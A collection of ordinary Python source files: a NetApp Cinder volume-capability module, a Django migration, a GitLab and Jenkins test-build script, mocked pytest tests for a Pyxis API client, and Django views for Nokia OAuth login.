id - name, vserver, junction_path, type
aggr - name, raid_type, ha_policy, disk_type
sis - dedup, compression
state - status, vserver_root, cluster_volume,
inconsistent, invalid, junction_active
qos - qos_policy_group
space - space-guarantee-enabled, space-guarantee,
thin_provisioned, size_avl_bytes, size_total_bytes
mirror - mirrored i.e. dp mirror
export - path
"""
def __init__(self, name, vserver=None):
self.id = {}
self.aggr = {}
self.sis = {}
self.state = {}
self.qos = {}
self.space = {}
self.mirror = {}
self.export = {}
self.id['name'] = name
self.id['vserver'] = vserver
def __eq__(self, other):
"""Checks for equality."""
if (self.id['name'] == other.id['name'] and
self.id['vserver'] == other.id['vserver']):
return True
def __hash__(self):
"""Computes hash for the object."""
return hash(self.id['name'])
def __cmp__(self, other):
"""Implements comparison logic for volumes."""
self_size_avl = self.space.get('size_avl_bytes')
other_size_avl = other.space.get('size_avl_bytes')
if self_size_avl is None and other_size_avl is not None:
return -1
elif self_size_avl is not None and other_size_avl is None:
return 1
elif self_size_avl is None and other_size_avl is None:
return 0
elif int(self_size_avl) < int(other_size_avl):
return -1
elif int(self_size_avl) > int(other_size_avl):
return 1
else:
return 0
def __str__(self):
"""Returns human readable form for object."""
vol_str = "NetApp Volume id: %s, aggr: %s,"\
" space: %s, sis: %s, state: %s, qos: %s"\
% (self.id, self.aggr, self.space, self.sis, self.state, self.qos)
return vol_str
@utils.trace_method
def get_cluster_vols_with_ssc(na_server, vserver, volume=None):
"""Gets ssc vols for cluster vserver."""
volumes = query_cluster_vols_for_ssc(na_server, vserver, volume)
sis_vols = get_sis_vol_dict(na_server, vserver, volume)
mirrored_vols = get_snapmirror_vol_dict(na_server, vserver, volume)
aggrs = {}
for vol in volumes:
aggr_name = vol.aggr['name']
if aggr_name:
if aggr_name in aggrs:
aggr_attrs = aggrs[aggr_name]
else:
aggr_attrs = query_aggr_options(na_server, aggr_name)
if aggr_attrs:
eff_disk_type = query_aggr_storage_disk(na_server,
aggr_name)
aggr_attrs['disk_type'] = eff_disk_type
aggrs[aggr_name] = aggr_attrs
vol.aggr['raid_type'] = aggr_attrs.get('raid_type')
vol.aggr['ha_policy'] = aggr_attrs.get('ha_policy')
vol.aggr['disk_type'] = aggr_attrs.get('disk_type')
if sis_vols:
if vol.id['name'] in sis_vols:
vol.sis['dedup'] = sis_vols[vol.id['name']]['dedup']
vol.sis['compression'] =\
sis_vols[vol.id['name']]['compression']
else:
vol.sis['dedup'] = False
vol.sis['compression'] = False
if (vol.space['space-guarantee-enabled'] and
(vol.space['space-guarantee'] == 'file' or
vol.space['space-guarantee'] == 'volume')):
vol.space['thin_provisioned'] = False
else:
vol.space['thin_provisioned'] = True
if mirrored_vols:
vol.mirror['mirrored'] = False
if vol.id['name'] in mirrored_vols:
for mirr_attrs in mirrored_vols[vol.id['name']]:
if (mirr_attrs['rel_type'] == 'data_protection' and
mirr_attrs['mirr_state'] == 'snapmirrored'):
vol.mirror['mirrored'] = True
break
return volumes
@utils.trace_method
def query_cluster_vols_for_ssc(na_server, vserver, volume=None):
"""Queries cluster volumes for ssc."""
query = {'volume-attributes': None}
volume_id = {
'volume-id-attributes': {
'owning-vserver-name': vserver,
'type': 'rw',
'style': 'flex',
},
}
if volume:
volume_id['volume-id-attributes']['name'] = volume
query['volume-attributes'] = volume_id
des_attr = {'volume-attributes':
['volume-id-attributes',
'volume-space-attributes',
'volume-state-attributes',
'volume-qos-attributes']}
result = netapp_api.invoke_api(na_server, api_name='volume-get-iter',
api_family='cm', query=query,
des_result=des_attr,
additional_elems=None,
is_iter=True)
vols = set()
for res in result:
records = res.get_child_content('num-records')
if records > 0:
attr_list = res.get_child_by_name('attributes-list')
if attr_list:
vol_attrs = attr_list.get_children()
vols_found = create_vol_list(vol_attrs)
vols.update(vols_found)
return vols
@utils.trace_method
def create_vol_list(vol_attrs):
"""Creates vol list with features from attr list."""
vols = set()
for v in vol_attrs:
try:
# name and vserver are mandatory
# Absence will skip by giving KeyError.
name = v['volume-id-attributes']['name']
vserver = v['volume-id-attributes']['owning-vserver-name']
vol = NetAppVolume(name, vserver)
vol.id['type'] =\
v['volume-id-attributes'].get_child_content('type')
if vol.id['type'] == "tmp":
continue
vol.id['junction_path'] =\
v['volume-id-attributes'].get_child_content('junction-path')
# state attributes mandatory.
vol.state['vserver_root'] =\
na_utils.to_bool(
v['volume-state-attributes'].get_child_content(
'is-vserver-root'))
if vol.state['vserver_root']:
continue
vol.state['status'] =\
v['volume-state-attributes'].get_child_content('state')
vol.state['inconsistent'] =\
na_utils.to_bool(
v['volume-state-attributes'].get_child_content(
'is-inconsistent'))
vol.state['invalid'] =\
na_utils.to_bool(
v['volume-state-attributes'].get_child_content(
'is-invalid'))
vol.state['junction_active'] =\
na_utils.to_bool(
v['volume-state-attributes'].get_child_content(
'is-junction-active'))
vol.state['cluster_volume'] =\
na_utils.to_bool(
v['volume-state-attributes'].get_child_content(
'is-cluster-volume'))
if (vol.state['status'] != 'online' or
vol.state['inconsistent'] or vol.state['invalid']):
# offline, invalid and inconsistent volumes are not usable
continue
# aggr attributes mandatory.
vol.aggr['name'] =\
v['volume-id-attributes']['containing-aggregate-name']
# space attributes mandatory.
vol.space['size_avl_bytes'] =\
v['volume-space-attributes']['size-available']
vol.space['size_total_bytes'] =\
v['volume-space-attributes']['size-total']
vol.space['space-guarantee-enabled'] =\
na_utils.to_bool(
v['volume-space-attributes'].get_child_content(
'is-space-guarantee-enabled'))
vol.space['space-guarantee'] =\
v['volume-space-attributes'].get_child_content(
'space-guarantee')
# qos attributes optional.
if v.get_child_by_name('volume-qos-attributes'):
vol.qos['qos_policy_group'] =\
v['volume-qos-attributes'].get_child_content(
'policy-group-name')
else:
vol.qos['qos_policy_group'] = None
vols.add(vol)
except KeyError as e:
LOG.debug('Unexpected error while creating'
' ssc vol list. Message - %s', e)
continue
return vols
@utils.trace_method
def query_aggr_options(na_server, aggr_name):
"""Queries cluster aggr for attributes.
Currently queries for raid and ha-policy.
"""
add_elems = {'aggregate': aggr_name}
attrs = {}
try:
result = netapp_api.invoke_api(na_server,
api_name='aggr-options-list-info',
api_family='cm', query=None,
des_result=None,
additional_elems=add_elems,
is_iter=False)
for res in result:
options = res.get_child_by_name('options')
if options:
op_list = options.get_children()
for op in op_list:
if op.get_child_content('name') == 'ha_policy':
attrs['ha_policy'] = op.get_child_content('value')
if op.get_child_content('name') == 'raidtype':
attrs['raid_type'] = op.get_child_content('value')
except Exception as e:
LOG.debug("Exception querying aggr options. %s", e)
return attrs
@utils.trace_method
def get_sis_vol_dict(na_server, vserver, volume=None):
"""Queries sis for volumes.
If volume is present sis is queried for it.
Records dedup and compression enabled.
"""
sis_vols = {}
query_attr = {'vserver': vserver}
if volume:
vol_path = '/vol/%s' % (volume)
query_attr['path'] = vol_path
query = {'sis-status-info': query_attr}
try:
result = netapp_api.invoke_api(na_server,
api_name='sis-get-iter',
api_family='cm',
query=query,
is_iter=True)
for res in result:
attr_list = res.get_child_by_name('attributes-list')
if attr_list:
sis_status = attr_list.get_children()
for sis in sis_status:
path = sis.get_child_content('path')
if not path:
continue
(___, __, vol) = path.rpartition('/')
if not vol:
continue
v_sis = {}
v_sis['compression'] = na_utils.to_bool(
sis.get_child_content('is-compression-enabled'))
v_sis['dedup'] = na_utils.to_bool(
sis.get_child_content('state'))
sis_vols[vol] = v_sis
except Exception as e:
LOG.debug("Exception querying sis information. %s", e)
return sis_vols
@utils.trace_method
def get_snapmirror_vol_dict(na_server, vserver, volume=None):
"""Queries snapmirror volumes."""
mirrored_vols = {}
query_attr = {'source-vserver': vserver}
if volume:
query_attr['source-volume'] = volume
query = {'snapmirror-info': query_attr}
try:
result = netapp_api.invoke_api(na_server,
api_name='snapmirror-get-iter',
api_family='cm', query=query,
is_iter=True)
for res in result:
attr_list = res.get_child_by_name('attributes-list')
if attr_list:
snap_info = attr_list.get_children()
for snap in snap_info:
src_volume = snap.get_child_content('source-volume')
v_snap = {}
v_snap['dest_loc'] =\
snap.get_child_content('destination-location')
v_snap['rel_type'] =\
snap.get_child_content('relationship-type')
v_snap['mirr_state'] =\
snap.get_child_content('mirror-state')
if mirrored_vols.get(src_volume):
mirrored_vols.get(src_volume).append(v_snap)
else:
mirrored_vols[src_volume] = [v_snap]
except Exception as e:
LOG.debug("Exception querying mirror information. %s", e)
return mirrored_vols
@utils.trace_method
def query_aggr_storage_disk(na_server, aggr):
"""Queries for storage disks associated to an aggregate."""
query = {'storage-disk-info': {'disk-raid-info':
{'disk-aggregate-info':
{'aggregate-name': aggr}}}}
des_attr = {'storage-disk-info':
{'disk-raid-info': ['effective-disk-type']}}
try:
result = netapp_api.invoke_api(na_server,
api_name='storage-disk-get-iter',
api_family='cm', query=query,
des_result=des_attr,
additional_elems=None,
is_iter=True)
for res in result:
attr_list = res.get_child_by_name('attributes-list')
if attr_list:
storage_disks = attr_list.get_children()
for disk in storage_disks:
raid_info = disk.get_child_by_name('disk-raid-info')
if raid_info:
eff_disk_type =\
raid_info.get_child_content('effective-disk-type')
if eff_disk_type:
return eff_disk_type
else:
continue
except Exception as e:
LOG.debug("Exception querying storage disk. %s", e)
return 'unknown'
@utils.trace_method
def get_cluster_ssc(na_server, vserver):
"""Provides cluster volumes with ssc."""
netapp_volumes = get_cluster_vols_with_ssc(na_server, vserver)
mirror_vols = set()
dedup_vols = set()
compress_vols = set()
thin_prov_vols = set()
ssc_map = {'mirrored': mirror_vols, 'dedup': dedup_vols,
'compression': compress_vols,
'thin': thin_prov_vols, 'all': netapp_volumes}
for vol in netapp_volumes:
if vol.sis.get('dedup'):
dedup_vols.add(vol)
if vol.sis.get('compression'):
compress_vols.add(vol)
if vol.mirror.get('mirrored'):
mirror_vols.add(vol)
if vol.space.get('thin_provisioned'):
thin_prov_vols.add(vol)
return ssc_map
@utils.trace_method
def refresh_cluster_stale_ssc(*args, **kwargs):
"""Refreshes stale ssc volumes with latest."""
backend = args[0]
na_server = args[1]
vserver = args[2]
identity = six.text_type(id(backend))
lock_pr = '%s_%s' % ('refresh_ssc', identity)
try:
job_set = na_utils.set_safe_attr(
backend, 'refresh_stale_running', True)
if not job_set:
return
@utils.synchronized(lock_pr)
def refresh_stale_ssc():
stale_vols = backend._update_stale_vols(reset=True)
LOG.info(_LI('Running stale ssc refresh job for %(server)s'
' and vserver %(vs)s'),
{'server': na_server, 'vs': vserver})
# refreshing single volumes can create inconsistency
# hence doing manipulations on copy
ssc_vols_copy = copy.deepcopy(backend.ssc_vols)
refresh_vols = set()
expired_vols = set()
for vol in stale_vols:
name = vol.id['name']
res = get_cluster_vols_with_ssc(na_server, vserver, name)
if res:
refresh_vols.add(res.pop())
else:
expired_vols.add(vol)
for vol in refresh_vols:
for k in ssc_vols_copy:
vol_set = ssc_vols_copy[k]
vol_set.discard(vol)
if k == "mirrored" and vol.mirror.get('mirrored'):
vol_set.add(vol)
if k == "dedup" and vol.sis.get('dedup'):
vol_set.add(vol)
if k == "compression" and vol.sis.get('compression'):
vol_set.add(vol)
if k == "thin" and vol.space.get('thin_provisioned'):
vol_set.add(vol)
if k == "all":
vol_set.add(vol)
for vol in expired_vols:
for k in ssc_vols_copy:
vol_set = ssc_vols_copy[k]
vol_set.discard(vol)
backend.refresh_ssc_vols(ssc_vols_copy)
LOG.info(_LI('Successfully completed stale refresh job for'
' %(server)s and vserver %(vs)s'),
{'server': na_server, 'vs': vserver})
refresh_stale_ssc()
finally:
na_utils.set_safe_attr(backend, 'refresh_stale_running', False)
@utils.trace_method
def get_cluster_latest_ssc(*args, **kwargs):
"""Updates volumes including ssc."""
backend = args[0]
na_server = args[1]
vserver = args[2]
identity = six.text_type(id(backend))
lock_pr = '%s_%s' % ('refresh_ssc', identity)
# As this depends on stale job running state
# set flag as soon as job starts to avoid
# job accumulation.
try:
job_set = na_utils.set_safe_attr(backend, 'ssc_job_running', True)
if not job_set:
return
@utils.synchronized(lock_pr)
def get_latest_ssc():
LOG.info(_LI('Running cluster latest ssc job for %(server)s'
' and vserver %(vs)s'),
{'server': na_server, 'vs': vserver})
ssc_vols = get_cluster_ssc(na_server, vserver)
backend.refresh_ssc_vols(ssc_vols)
backend.ssc_run_time = timeutils.utcnow()
LOG.info(_LI('Successfully completed ssc job for %(server)s'
' and vserver %(vs)s'),
{'server': na_server, 'vs': vserver})
get_latest_ssc()
finally:
na_utils.set_safe_attr(backend, 'ssc_job_running', False)
@utils.trace_method
def refresh_cluster_ssc(backend, na_server, vserver, synchronous=False):
"""Refresh cluster ssc for backend."""
if not isinstance(na_server, netapp_api.NaServer):
raise exception.InvalidInput(reason=_("Backend server not NaServer."))
delta_secs = getattr(backend, 'ssc_run_delta_secs', 1800)
if getattr(backend, 'ssc_job_running', None):
LOG.warning(_LW('ssc job in progress. Returning... '))
return
elif (getattr(backend, 'ssc_run_time', None) is None or
(backend.ssc_run_time and
timeutils.is_older_than(backend.ssc_run_time, delta_secs))):
if synchronous:
get_cluster_latest_ssc(backend, na_server, vserver)
else:
t = threading.Timer(0, get_cluster_latest_ssc,
args=[backend, na_server, vserver])
t.start()
elif getattr(backend, 'refresh_stale_running', None):
LOG.warning(_LW('refresh stale ssc job in progress. Returning... '))
return
else:
if backend.stale_vols:
if synchronous:
refresh_cluster_stale_ssc(backend, na_server, vserver)
else:
t = threading.Timer(0, refresh_cluster_stale_ssc,
args=[backend, na_server, vserver])
t.start()
@utils.trace_method
def get_volumes_for_specs(ssc_vols, specs):
"""Shortlists volumes for extra specs provided."""
if specs is None or specs == {} or not isinstance(specs, dict):
return ssc_vols['all']
result = copy.deepcopy(ssc_vols['all'])
raid_type = specs.get('netapp:raid_type')
disk_type = specs.get('netapp:disk_type')
bool_specs_list = ['netapp_mirrored', 'netapp_unmirrored',
'netapp_dedup', 'netapp_nodedup',
'netapp_compression', 'netapp_nocompression',
'netapp_thin_provisioned', 'netapp_thick_provisioned']
b_specs = {}
for spec in bool_specs_list:
b_specs[spec] = na_utils.to_bool(specs.get(spec))\
if specs.get(spec) else None
def _spec_ineffect(b_specs, spec, opp_spec):
"""If the spec with opposite spec is ineffective."""
if ((b_specs[spec] is None and b_specs[opp_spec] is None)
or (b_specs[spec] == b_specs[opp_spec])):
return True
else:
return False
if _spec_ineffect(b_specs, 'netapp_mirrored', 'netapp_unmirrored'):
pass
else:
if b_specs['netapp_mirrored'] or b_specs['netapp_unmirrored'] is False:
result = result & ssc_vols['mirrored']
else:
result = result - ssc_vols['mirrored']
if _spec_ineffect(b_specs, 'netapp_dedup', 'netapp_nodedup'):
pass
else:
if b_specs['netapp_dedup'] or b_specs['netapp_nodedup'] is False:
result = result & ssc_vols['dedup']
else:
result = result - ssc_vols['dedup']
if _spec_ineffect(b_specs, 'netapp_compression', 'netapp_nocompression'):
pass
else:
if (b_specs['netapp_compression'] or
b_specs['netapp_nocompression'] is False):
result = result & ssc_vols['compression']
else:
result = result - ssc_vols['compression']
if _spec_ineffect(b_specs, 'netapp_thin_provisioned',
'netapp_thick_provisioned'):
pass
else:
if (b_specs['netapp_thin_provisioned'] or
b_specs['netapp_thick_provisioned'] is False):
result = result & ssc_vols['thin']
else:
result = result - ssc_vols['thin']
if raid_type or disk_type:
tmp = copy.deepcopy(result)
for vol in tmp:
if raid_type:
vol_raid = vol.aggr['raid_type']
vol_raid = vol_raid.lower() if vol_raid else None
if raid_type.lower() != vol_raid:
result.discard(vol)
if disk_type:
vol_dtype = vol.aggr['disk_type']
vol_dtype = vol_dtype.lower() if vol_dtype else None
if disk_type.lower() != vol_dtype:
result.discard(vol)
return result
@utils.trace_method
def check_ssc_api_permissions(client_cmode):
"""Checks backend SSC API permissions for the user."""
api_map = {'storage-disk-get-iter': ['netapp:disk_type'],
'snapmirror-get-iter': ['netapp_mirrored',
'netapp_unmirrored'],
'sis-get-iter': ['netapp_dedup', 'netapp_nodedup',
'netapp_compression',
'netapp_nocompression'],
'aggr-options-list-info': ['netapp:raid_type'],
'volume-get-iter': []}
failed_apis = client_cmode.check_apis_on_cluster(api_map.keys())
if failed_apis:
if 'volume-get-iter' in failed_apis:
msg = _("Fatal error: User not permitted"
" to query NetApp volumes.")
raise exception.VolumeBackendAPIException(data=msg)
else:
unsupp_ssc_features = []
for fail in failed_apis:
unsupp_ssc_features.extend(api_map[fail])
LOG.warning(_LW("The user does not have access or sufficient "
"privileges to use all netapp APIs. The "
"following extra_specs will fail or be ignored: "
"%s"), unsupp_ssc_features)
| nilq/baby-python | python |
# -*- coding: utf-8 -*-
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('transmittals', '0047_auto_20160224_1220'),
]
operations = [
migrations.AlterField(
model_name='outgoingtransmittal',
name='latest_revision',
field=models.ForeignKey(verbose_name='Latest revision', to='transmittals.OutgoingTransmittalRevision', null=True),
),
migrations.AlterField(
model_name='transmittal',
name='latest_revision',
field=models.ForeignKey(verbose_name='Latest revision', to='transmittals.TransmittalRevision', null=True),
),
]
| nilq/baby-python | python |
"""
一键编译测试版本的app给qa:
1、改库版本号为测试版本号
2、改app的库依赖为测试版本号依赖
3、编库
4、编app
"""
import json
import sys
from base import sb_nexus, sb_jenkins, sb_config, sb_gitlab
def _print_task(task):
print(f'apps: {str(task["apps"])}')
print(f'libs: {str(task["libs"])}')
print(f'branch: {task["branch"]}')
print(f'release_note: {task["release_note"]}')
print(f'rebuild_lib: {task["rebuild_lib"]}')
def get_lib_test_version(sb_nxs, libs, rebuild_lib):
"""
获取所有库的测试版本号(-test-username-version)
:param sb_nxs:
:param libs:
:param rebuild_lib: True-重新升版本号,编译。False-使用已有的包。
:return:
"""
print(f'get lib test version: {len(libs)}')
lib_version_dict = {}
for lib in libs:
lib_test_version = sb_nxs.get_next_lib_version(lib, rebuild_lib)
print(f' {lib} -> {lib_test_version}')
if lib_test_version is None:
print(f' get {lib} test version fail')
return None
lib_version_dict[lib] = lib_test_version
return lib_version_dict
def get_lib_test_version_1(sb_gtlb, sb_nxs, libs, rebuild_lib):
"""
获取所有库的测试版本号(-test-username-version)
:param sb_nxs:
:param libs:
:param rebuild_lib: True-重新升版本号,编译。False-使用已有的包。
:return:
"""
print(f'get lib test version: {len(libs)}')
lib_version_dict = {}
for lib in libs:
latest_version = sb_gtlb.get_lib_latest_version(lib)
next_version = _get_next_lib_version(latest_version)
all_versions = sb_nxs.get_all_lib_version(lib)
lib_test_version = _get_test_lib_version(next_version, all_versions, rebuild_lib)
print(f' {lib} -> {lib_test_version}')
if lib_test_version is None:
print(f' get {lib} test version fail')
return None
lib_version_dict[lib] = lib_test_version
return lib_version_dict
def update_lib_version(sb_gtlb, branch, lib_version_dict, rebuild_lib):
"""
在库的指定分支上更新版本号
:param sb_gtlb:
:param branch:
:param lib_version_dict:
:param rebuild_lib:
:return:
"""
print(f'update lib version: {len(lib_version_dict)}')
if rebuild_lib:
for lib, version in lib_version_dict.items():
r = sb_gtlb.update_lib_version(branch, lib, version)
print(f' {lib} -> {r}')
if not r:
print(f' update {lib} version fail')
return False
else:
print(f' not rebuild libs')
return True
def check_app_work_branch(sb_gtlb, apps, branch):
"""
检测app上面是否存在工作分支,不存在就创建
:param apps:
:param branch:
:return:
"""
print(f'check app work branch: {len(apps)}')
for app in apps:
exist = sb_gtlb.is_app_branch_exist(app, branch)
if exist:
print(f' {app} -> exist')
else:
create = sb_gtlb.create_app_branch(app, branch)
if create:
print(f' {app} -> create')
else:
print(f' create branch {branch} for {app} fail')
return False
return True
def update_app_dependencies(sb_gtlb, apps, branch, lib_version_dict):
"""
在app的工作分支上更新库的版本号为测试版本号
:param sb_gtlb:
:param apps:
:return:
"""
print(f'update app dependencies: {len(apps)}')
for app in apps:
r = sb_gtlb.update_app_dependencies_without_force(branch, app, lib_version_dict)
print(f' {app} -> {r}')
if not r:
print(f' update {app} dependencies fail')
return False
return True
def build_test_lib(sb_jks, libs, rebuild_lib, branch, release_note):
"""
编译测试的库
:param sb_jks:
:param libs:
:param rebuild_lib:
:param branch:
:param release_note:
:return:
"""
print(f'build test lib: {len(libs)}')
if rebuild_lib:
for lib in libs:
r = sb_jks.build_test_lib(lib, branch, release_note)
print(f' {lib} -> {r}')
if not r:
print(f' build {lib} fail')
return False
else:
print(f' not rebuild libs')
return True
def build_test_app(sb_jks, apps, branch, release_note):
"""
编译测试app
:return:
"""
print(f'build test app: {len(apps)}')
for app in apps:
r = sb_jks.build_test_app(app, branch, release_note)
print(f' {app} -> {r}')
if not r:
print(f' build {app} fail')
return False
return True
def _get_next_lib_version(current_version):
"""
获取该版本号下一个版本号,3位4位分开处理
:param current_version:
:return:
"""
seg = current_version.split('.')
ver_len = len(seg)
if ver_len == 4:
idx = ver_len - 2
new_v = int(seg[idx]) + 1
seg[idx] = str(new_v)
return '.'.join(seg)
elif ver_len == 3:
idx = ver_len - 1
new_v = int(seg[idx]) + 1
seg[idx] = str(new_v)
return '.'.join(seg)
else:
raise Exception(f'库版本号不是3位或4位,{current_version}')
def _get_test_lib_version(next_version, all_version_list, rebuild_lib):
if next_version in all_version_list:
raise Exception(f'下一个版本号 {next_version} 已经发过版本,出错了。')
test_versions = []
test_version_prefix = next_version + '-test-hjf'
for v in all_version_list:
if test_version_prefix in v:
test_versions.append(v)
if test_versions:
def sort_key(e):
seg = e.split('-')
return int(seg[len(seg) - 1])
test_versions.sort(key=sort_key, reverse=True)
newest_test_version = test_versions[0]
if not rebuild_lib:
return newest_test_version
seg = newest_test_version.split('-')
seg[len(seg) - 1] = str(int(seg[len(seg) - 1]) + 1)
return '-'.join(seg)
else:
if not rebuild_lib:
raise Exception('没有可用的测试版本,必须要重新编译')
return test_version_prefix + '-1'
def main():
task_file = sys.argv[1]
task = json.load(open(task_file))
# rebuild_lib deprecated, always True
task["rebuild_lib"] = True
_print_task(task)
execute = input('确认参数正确,继续执行?(y/n)')
if execute != 'y':
return 1
apps = task['apps']
libs = task['libs']
branch = task['branch']
release_note = task['release_note']
rebuild_lib = task['rebuild_lib']
sb_cfg = sb_config.SBConfig()
sb_nxs = sb_nexus.SBNexus(sb_cfg)
sb_gtlb = sb_gitlab.SBGitlab(sb_cfg)
sb_jks = sb_jenkins.SBJenkins(sb_cfg)
lib_version_dict = get_lib_test_version_1(sb_gtlb, sb_nxs, libs, rebuild_lib)
if not lib_version_dict:
return 2
ulv = update_lib_version(sb_gtlb, branch, lib_version_dict, rebuild_lib)
if not ulv:
return 3
cawb = check_app_work_branch(sb_gtlb, apps, branch)
if not cawb:
return 4
uad = update_app_dependencies(sb_gtlb, apps, branch, lib_version_dict)
if not uad:
return 5
btl = build_test_lib(sb_jks, lib_version_dict, rebuild_lib, branch, release_note)
if not btl:
return 6
bta = build_test_app(sb_jks, apps, branch, release_note)
if not bta:
return 7
return 0
if __name__ == '__main__':
main()
| nilq/baby-python | python |
from typing import Any
from unittest.mock import MagicMock, patch
import pytest
from operatorcert import pyxis
from requests import HTTPError, Response
def test_is_internal(monkeypatch: Any) -> None:
assert not pyxis.is_internal()
monkeypatch.setenv("PYXIS_CERT_PATH", "/path/to/cert.pem")
monkeypatch.setenv("PYXIS_KEY_PATH", "/path/to/key.key")
assert pyxis.is_internal()
def test_get_session_api_key(monkeypatch: Any) -> None:
monkeypatch.setenv("PYXIS_API_KEY", "123")
session = pyxis._get_session()
assert session.headers["X-API-KEY"] == "123"
def test_get_session_cert(monkeypatch: Any) -> None:
monkeypatch.setenv("PYXIS_CERT_PATH", "/path/to/cert.pem")
monkeypatch.setenv("PYXIS_KEY_PATH", "/path/to/key.key")
session = pyxis._get_session()
assert session.cert == ("/path/to/cert.pem", "/path/to/key.key")
def test_get_session_no_auth(monkeypatch: Any) -> None:
with pytest.raises(Exception):
pyxis._get_session()
@patch("operatorcert.pyxis._get_session")
def test_post(mock_session: MagicMock) -> None:
mock_session.return_value.post.return_value.json.return_value = {"key": "val"}
resp = pyxis.post("https://foo.com/v1/bar", {})
assert resp == {"key": "val"}
@patch("operatorcert.pyxis._get_session")
def test_patch(mock_session: MagicMock) -> None:
mock_session.return_value.patch.return_value.json.return_value = {"key": "val"}
resp = pyxis.patch("https://foo.com/v1/bar", {})
assert resp == {"key": "val"}
@patch("operatorcert.pyxis._get_session")
def test_patch_error(mock_session: MagicMock) -> None:
response = Response()
response.status_code = 400
mock_session.return_value.patch.return_value.raise_for_status.side_effect = (
HTTPError(response=response)
)
with pytest.raises(HTTPError):
pyxis.patch("https://foo.com/v1/bar", {})
@patch("operatorcert.pyxis._get_session")
def test_put(mock_session: MagicMock) -> None:
mock_session.return_value.put.return_value.json.return_value = {"key": "val"}
resp = pyxis.put("https://foo.com/v1/bar", {})
assert resp == {"key": "val"}
@patch("operatorcert.pyxis._get_session")
def test_put_error(mock_session: MagicMock) -> None:
response = Response()
response.status_code = 400
mock_session.return_value.put.return_value.raise_for_status.side_effect = HTTPError(
response=response
)
with pytest.raises(HTTPError):
pyxis.put("https://foo.com/v1/bar", {})
@patch("operatorcert.pyxis._get_session")
def test_get(mock_session: MagicMock) -> None:
mock_session.return_value.get.return_value = {"key": "val"}
resp = pyxis.get("https://foo.com/v1/bar")
assert resp == {"key": "val"}
@patch("operatorcert.pyxis._get_session")
def test_post_error(mock_session: MagicMock) -> None:
response = Response()
response.status_code = 400
mock_session.return_value.post.return_value.raise_for_status.side_effect = (
HTTPError(response=response)
)
with pytest.raises(HTTPError):
pyxis.post("https://foo.com/v1/bar", {})
@patch("operatorcert.pyxis._get_session")
def test_get_project(mock_session: MagicMock) -> None:
mock_session.return_value.get.return_value.json.return_value = {"key": "val"}
resp = pyxis.get_project("https://foo.com/v1", "123")
assert resp == {"key": "val"}
@patch("operatorcert.pyxis._get_session")
def test_get_project_error(mock_session: MagicMock) -> None:
response = Response()
response.status_code = 400
mock_session.return_value.get.return_value.raise_for_status.side_effect = HTTPError(
response=response
)
with pytest.raises(HTTPError):
pyxis.get_project("https://foo.com/v1", "123")
@patch("operatorcert.pyxis._get_session")
def test_get_vendor_by_org_id(mock_session: MagicMock) -> None:
mock_session.return_value.get.return_value.json.return_value = {"key": "val"}
resp = pyxis.get_vendor_by_org_id("https://foo.com/v1", "123")
assert resp == {"key": "val"}
@patch("operatorcert.pyxis._get_session")
def test_get_vendor_by_org_id_error(mock_session: MagicMock) -> None:
response = Response()
response.status_code = 400
mock_session.return_value.get.return_value.raise_for_status.side_effect = HTTPError(
response=response
)
with pytest.raises(HTTPError):
pyxis.get_vendor_by_org_id("https://foo.com/v1", "123")
@patch("operatorcert.pyxis._get_session")
def test_get_repository_by_isv_pid(mock_session: MagicMock) -> None:
mock_session.return_value.get.return_value.json.return_value = {
"data": [{"key": "val"}]
}
resp = pyxis.get_repository_by_isv_pid("https://foo.com/v1", "123")
assert resp == {"key": "val"}
@patch("operatorcert.pyxis._get_session")
def test_get_repository_by_isv_pid_error(mock_session: MagicMock) -> None:
response = Response()
response.status_code = 400
mock_session.return_value.get.return_value.raise_for_status.side_effect = HTTPError(
response=response
)
with pytest.raises(HTTPError):
pyxis.get_repository_by_isv_pid("https://foo.com/v1", "123")
| nilq/baby-python | python |
from pybuilder.core import use_plugin, init
use_plugin("python.core")
use_plugin("python.unittest")
default_task = "publish"
@init
def initialize(project):
project.version = "0.1.0.SNAPSHOT"
| nilq/baby-python | python |
from drpg.sync import DrpgSync
__all__ = ["DrpgSync"]
__version__ = "2021.11.0"
| nilq/baby-python | python |
import logging
from django.contrib.auth.decorators import login_required
from django.contrib.auth.signals import user_logged_in
from django.core.urlresolvers import reverse
from django.dispatch import receiver
from django.http import HttpResponse, Http404
from django.shortcuts import redirect, render
from django.utils import timezone
from django.views.decorators.csrf import csrf_exempt
from . import utils
from .models import NokiaUser, MeasureGroup
try:
from django.urls import NoReverseMatch
except ImportError:
# Fallback for older Djangos
from django.core.urlresolvers import NoReverseMatch
logger = logging.getLogger(__name__)
@login_required
def login(request):
"""
Begins the OAuth authentication process by obtaining a Request Token from
Nokia and redirecting the user to the Nokia site for authorization.
When the user has finished at the Nokia site, they will be redirected
to the :py:func:`nokiaapp.views.complete` view.
If 'next' is provided in the GET data, it is saved in the session so the
:py:func:`nokiaapp.views.complete` view can redirect the user to that
URL upon successful authentication.
URL name:
`nokia-login`
"""
next_url = request.GET.get('next', None)
if next_url:
request.session['nokia_next'] = next_url
else:
request.session.pop('nokia_next', None)
callback_uri = request.build_absolute_uri(reverse('nokia-complete'))
auth = utils.create_nokia_auth(callback_uri)
auth_url = auth.get_authorize_url()
return redirect(auth_url)
@login_required
def complete(request):
"""
After the user authorizes us, Nokia sends a callback to this URL to
complete authentication.
If there was an error, the user is redirected again to the `error` view.
If the authorization was successful, the credentials are stored for us to
use later, and the user is redirected. If 'next_url' is in the request
session, the user is redirected to that URL. Otherwise, they are
redirected to the URL specified by the setting
:ref:`NOKIA_LOGIN_REDIRECT`.
If :ref:`NOKIA_SUBSCRIBE` is set to True, add a subscription to user
data at this time.
URL name:
`nokia-complete`
"""
callback_uri = request.build_absolute_uri(reverse('nokia-complete'))
auth = utils.create_nokia_auth(callback_uri)
try:
code = request.GET.get('code')
except KeyError:
return redirect(reverse('nokia-error'))
if not code:
return redirect(reverse('nokia-error'))
try:
creds = auth.get_credentials(code)
except:
return redirect(reverse('nokia-error'))
user_updates = {
'access_token': creds.access_token,
'token_expiry': creds.token_expiry,
'token_type': creds.token_type,
'refresh_token': creds.refresh_token,
'nokia_user_id': creds.user_id,
'last_update': timezone.now(),
}
nokia_user = NokiaUser.objects.filter(user=request.user)
if nokia_user.exists():
nokia_user.update(**user_updates)
nokia_user = nokia_user[0]
else:
user_updates['user'] = request.user
nokia_user = NokiaUser.objects.create(**user_updates)
# Add the Nokia user info to the session
api = utils.create_nokia(**nokia_user.get_user_data())
request.session['nokia_profile'] = api.get_user()
MeasureGroup.create_from_measures(request.user, api.get_measures())
